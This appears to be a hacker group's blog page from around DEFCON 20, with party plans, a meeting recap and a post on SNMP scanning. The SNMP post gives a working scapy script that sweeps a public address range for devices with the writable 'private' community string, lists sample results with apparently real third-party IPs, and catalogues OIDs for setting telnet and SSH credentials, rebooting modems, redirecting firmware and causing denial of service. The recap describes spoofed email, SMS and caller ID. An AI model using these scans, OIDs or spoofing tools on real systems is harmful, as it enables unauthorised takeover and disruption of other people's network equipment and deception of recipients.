dc414 @ DEFCON20

Most of the crew will be in Vegas for DEFCON20 this year!!! Lets all get drunk and party! I will also be getting married while there to the super awesome cmoney!! For our brothers not going, we will be doing our best to drink your share of booze ๐Ÿ™‚ I get the opportunity to speak on the DCG panel again this year so if you are at DC20 come check it out, me and other POCs will be laying down some knowledge for y’all. Also find me or other dc414 members so we can all party ๐Ÿ˜€ I will be taking lots of pictures and posting them on Twitter, Facebook, and G+ so be sure to check that shit out as well. See ya there.

Good times with snmp

At the last meeting dw5304 gave a demo on snmp scanning and gaining access to things you shouldn’t have access to with a few home brew windows apps he coded up. Its been a while since I messed with snmp but his demo got me back into it, so I made a little python script to scan subnets for open snmp servers with the read/write string set to private. Here is the code:

#! /usr/bin/env python
import commands
from scapy.all import *

base = "69.2.1." #IP range to scan minus the last octet.
f = open('/tmp/snmp_output.txt', 'w+')
for i in range(1, 255):
ip = base+str(i)
print ip+"\n"
p = IP(dst=ip)/UDP(dport=161, sport=39445)/SNMP(community="private",PDU=SNMPget(id=1416992799, varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1.0"))]))
pkt = sr1(p, timeout=1)
if pkt and pkt.sprintf("%IP.proto%") != "icmp":
p1 = pkt.sprintf("%SNMP.PDU%").split("ASN1_STRING['", 1)
p2 = p1[1].split("'", 1)
print pkt.sprintf("%IP.src%")+" - "+p2[0]
f.write(pkt.sprintf("%IP.src%")+" - "+p2[0]+"\n")
f.close()
print "\nDONE!!!!!!!!!!!!!!!\n"

Its a little hacked together and could use improvement but it works “feel free to send in any improvements you make”. It puts all the found servers IPs in /tmp/snmp_output.txt along with their system description enumerated via snmp. Here is a sample output:

69.1.117.87 - Ruckus Wireless Inc (C) 2006
69.1.117.156 - Ruckus Wireless Inc (C) 2006
69.1.117.190 - Ruckus Wireless Inc (C) 2006
69.1.117.193 - Ruckus Wireless Inc (C) 2006
69.1.117.203 - Ruckus Wireless Inc (C) 2006
69.1.117.221 - Ruckus Wireless Inc (C) 2006
69.1.163.92 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE
69.1.163.93 - Product: GW 4 FXS;SW Version: 5.80A.023.006

Once you find a few servers you can do snmpwalks on them and scour it for juicy info.
Here are some good OIDs to look for and/or set: *found most of this online & got some from dw5304

ip.ipForwarding.0 <-this tells you if its forwarding packets or not "useful to DoS a device" 1.3.6.1.2.1.4.24.2.1.1 <-ipforwardingdest sysName.0 <-device name 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 i 1 ... EnableTelnetServer. 1.3.6.1.4.1.4413.2.2.2.1.1.1.1.0....telnetIpStackInterfaces. 1.3.6.1.4.1.4413.2.2.2.1.1.1.2.0....telnetUserName.. 1.3.6.1.4.1.4413.2.2.2.1.1.1.3.0....telnetPassword.. 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0....telnetServerControl. 1.3.6.1.4.1.4413.2.2.2.1.1.1.5.0....telnetSessionIp. 1.3.6.1.4.1.4413.2.2.2.1.1.1.6.0....telnetSessionInProgress. 1.3.6.1.4.1.4413.2.2.2.1.1.1.7.0....telnetForceUserLogout. 1.3.6.1.2.1.1.1.0 = System Description 1.3.6.1.2.1.1.3.0 = Modem up time 1.3.6.1.2.1.4 = Some useful information (walk) 1.3.6.1.2.1.4.20.1.1.0 = HFC IP (getnext) 1.3.6.1.2.1.4.20.1.3.0 = HFC Subnet (getnext) 1.3.6.1.2.1.2.2.1.6.2= Mac 1.3.6.1.2.1.10.127.1.1.3.1.3.1 = Maximum upload bandwidth 1.3.6.1.2.1.10.127.1.1.3.1.5.1 = Maximum download bandwidth 1.3.6.1.2.1.10.127.1.1.4.1 = Current status (walk) 1.3.6.1.2.1.17.4.3.1.1.0 = Hosts behind modem 1.3.6.1.2.1.69.1.4.4.0 = TFTP Configuration file server IP 1.3.6.1.2.1.69.1.4.5.0 = Configuration file name 1.3.6.1.2.1.69.1.3.5.0 = Current firmware 1.3.6.1.2.1.69.1.4.2.0 = DHCP Server IP 1.3.6.1.2.1.69.1.4.3.0 = Time Server IP 1.3.6.1.2.1.69.1.5.8.1.7 = View Log (walk) 1.3.6.1.2.1.10.127.1.1.1.1.2.3 = Downstream Frequency 1.3.6.1.2.1.69.1.4.5.0 = Image File 1.3.6.1.2.1.17.4.3.1.1 = Learned MAC (Get Next) ---[ Read / Write OIDs 1.3.6.1.2.1.69.1.1.3.0 = Boot modem (1=boot now) 1.3.6.1.2.1.69.1.3.1.0 = TFTP Firmware server IP 1.3.6.1.2.1.69.1.3.2.0 = Firmware filename 1.3.6.1.2.1.69.1.3.3.0 = Firmware update status (1=update now, 2=update on boot,3=disable updates) 1.3.6.1.2.1.69.1.5.2.0 = SNMP Traps server IP (0.0.0.0 = disabled) 1.3.6.1.2.1.69.1.5.3.0 = SNMP Traps status (1=enabled, 4=disabled) 1.3.6.1.4.1.1166.1.19.3.1.14.0 = SNMP Port 1.3.6.1.4.1.1166.1.19.3.1.15.0 = SNMP Traps port 1.3.6.1.4.1.1166.1.19.3.1.17.0 = HTML Server status (1=enabled, 2=disabled)Other OIDs 1.3.6.1.2.1.1.5.0 = modem type 1.3.6.1.3.83.1.1.4.0 = Cable Modem Serial Number 1.3.6.1.3.83.1.4.5.0 = Alternate OID for Config File 1.3.6.1.3.83.1.4.3.0 = Provisional Server 1.3.6.1.2.1.1.6.0 = Area String 1.3.6.1.2.1.4.20.1.3+(hfc ip) = Subnet Example 1.3.6.1.2.4.20.1.3.10.169.53.2451.3.6.1.3.103.1.5.1.3.1.5 = CPE USB MAC 1.3.6.1.2.1.2.2.1.6.1 = Cable Modem USB MAC 1.3.1.6.1.2.1.10.127.1.2.1.1.1.2 = Default Gateway MAC Address 1.3.6.1.2.1.2.10.127.1.1.3.1.6.1 = Max Burst Up 1.3.6.1.2.1.2.2.1.6.5 = CPE MAC 1.3.6.1.4.1.1166.1.19.3.1.17.0Ii 1 or 0 enable or disable webif 1.3.6.1.4.1.4413.2.2.2.1.1.4.1 =โ€reflects the IP stack interfaces on which a ssh 1.3.6.1.4.1.4413.2.2.2.1.1.4.2 = "reflects the user name which will be allowed ssh access." 1.3.6.1.4.1.4413.2.2.2.1.1.4.3 = "reflects the password which will be allowed ssh access." 1.3.6.1.4.1.4413.2.2.2.1.1.4.4 = "start or stop the ssh server. 1.3.6.1.4.1.4413.2.2.2.1.1.4.7 =terminate ssh session

You can find a lot more online. Enjoy and happy hacking ๐Ÿ™‚

July meeting sweetness

July’s meeting was hot in more then one way! First I would like to thank genero again for his genorous donation for the raffle, which put a solid $200 in the 3d printer fund!! Also congrats to faraday for winning both the raffle and the Photoshop and WIN contest!! I know it took forever to pick a winner but we did it damnit ๐Ÿ˜›

ngharo started the demos off with talking about how he set up dc414’s new astrisk server using google voice as the SIP trunk! Then showed us how he set it up to use NMAP to scan IPs from asterisk and speak the results to you over the phone! Klaiviel took over and made Ngharo a case for his raspberry pi and a penny launcher with his sweet 3d printer. Then I stepped in and showed everyone how to send spoofed emails from the dc414 server using the email spoofer web app, then how to send spoofed txt messages using the same app ๐Ÿ™‚ Then Tony used a SIP provider that allowed for spoofing CID to spoof a call to Vlad. Then dw5304 wowed us all with a SNMP scanner he made, showed us some of the results like accessing a routers, modems, and windmills!!

Here are some pics from the meeting thanx to cmoney and congrats to Castor for winning the dc414 free junk giveaway!

Here is Faraday with his raffle winnings!

Here is Castor and his free junk from dc414